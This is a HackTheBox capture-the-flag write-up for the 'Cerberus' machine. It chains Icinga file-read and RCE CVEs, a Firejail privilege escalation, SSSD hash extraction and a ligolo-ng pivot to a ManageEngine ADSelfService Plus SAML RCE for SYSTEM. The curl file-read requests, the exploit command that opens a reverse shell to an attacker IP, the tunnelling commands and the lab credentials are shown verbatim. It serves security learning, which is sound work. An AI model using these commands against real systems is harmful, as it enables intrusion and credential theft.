Cerberus — HackTheBox

Abdul Wassay (Hot Plugin)
7 min readJul 30, 2023

--

Introduction

Cerberus is a hard machine from HackTheBox. It involves exploiting File Read and RCE CVEs in icinga to get foothold, escalating privileges by LPE CVE in firejail, pivoting to DC and finally getting SYSTEM by exploiting RCE in ADSelfService Plus.

NMAP

PORT     STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)

Port 8080 (HTTP)

In the nmap scan, we found that port 8080 is open and redirects to icinga.cerberus.local , so let’s add it in the /etc/hosts file. Then, navigating to the website, we get the following login page.

Icinga is an open-source computer system and network monitoring application. While searching on google about it, i came across following blog post which shares detail about recent CVEs in the Incinga web.

Arbitrary File Disclosure (CVE-2022–24716)

Trying out the given PoC in the above blog, we can successfully read files from the system.

curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts -scurl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini

In the resources.ini file, we can get the credentials for icinga login.

 curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini -s

Using the credentials, we get logged in as matthew user.

Remote Code Execution (CVE-2022–24715)

The above mentioned blog also provides the details to exploit authenticated RCE in icinga. But, i will be using the following PoC to exploit this CVE.

Running the exploit, we can see that what options we need to provide.

In the options, we need to provide a private key (PEM) file. It can be generated by the following command

ssh-keygen -m pem

Now that we have all things we need, running the exploit, we get a reverse shell as www-data on the box.

python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.30 -P 4444 -u matthew -p IcingaWebPassword2023 -e ./mykey

Firejail PrivEsc (CVE-2022–31214)

While enumerating, we found that firejail is a SUID binary.

Searching on google, it can be found that it has a privilege escalation vulnerability. Following resource provides the PoC to exploit this vulnerability in Firejail.

This blog says that firejail version 0.9.68 and older are vulnerable. So, checking the version on the machine, we can confirm that it is vulnerable.

Download and transfer the firejail exploit onto the target. When running it gives a command to run on another terminal.

So, we pop another shell and run the given command. After that we can just switch to root user.

Post Compromise Enumeration

After some enumeration, we can guess that this machine is domain joined. Looking at the /etc/hosts file, we can get the IP of DC.

Since, this is domain joined linux machine, searching on google i found the following:

sssd on a Linux system is responsible for enabling the system to access authentication services from a remote source such as Active Directory.

We can confirm that it is being used on this system by looking at the config file.

The following resource shows that we can extract credentials from the SSSD db file.

So, we move into the SSSD db directory and running strings on the db file, we get a username and a hash.

Cracking the hash using John, we get password of matthew user.

Pivoting to DC

Since, we know that DC is on another network, so we need to establish a tunnel to pivot to it. I will be using ligolo-ng for this task.

Download ligolo-proxy and run the following commands on our box to set it up.

# on kali
sudo ip tuntap add user plugin mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.22.0/24 dev ligolo
./proxy -selfcert

Now, we need to transfer the ligolo-agent on the target machine. And run the following command.

./agent -connect 10.10.14.30:11601 -ignore-cert

Now that connection is etablished, we need to start the tunnel from ligolo proxy.

session
start

Now that tunnel is established, we can easily interact with the DC. Using the crackmapexec, we can confirm that credentials are working on DC.

crackmapexec winrm 172.16.22.1 -u matthew -p 147258369

Using evil-winrm, we login on the server and get the user flag.

Getting SYSTEM

While enumeration, looking at the program files, we found the manage engine folder, which contains AD Self Service folder.

ADSelfService Plus is an identity security solution. It is used for password management on domain.

This service runs on port 9251. Since, it will have an interface, it tried to open it in browser, but it did not open. I got curious and port scanned the DC using static nmap from the linux machine and found that it had only one open port.

But from shell on the DC, we can see that port is open.

The next step, i did was to transfer the windows ligolo-agent to the DC and make a connection to our host.

Then, switch the ligolo session to this one.

Now, when we open https://172.16.22.1:9251/ in our browser, it redirects to dc.cerberus.local , let’s add this in our /etc/hosts file.

Now, opening the URL, we get the following login page

Using the credentials of matthew, we can login but it says that we are not authorized to view.

ManageEngine ADSelfService Plus Unauthenticated SAML RCE (CVE-2022–47966)

There’s nothing else that we can do. Searching on google, came across a recent CVE in the Manage Engine AD Self Service. It can exploited by Metasploit.

But to run the metasploit exploit, we need to set some options, specially GUID and ISSUER_URL. We can see the GUID in the URL in above screen shot where it says unauthorized. For issuer URL, we can find it on google.

After providing all options, it looks like following

Running the exploit, we get shell as SYSTEM.

References

--

--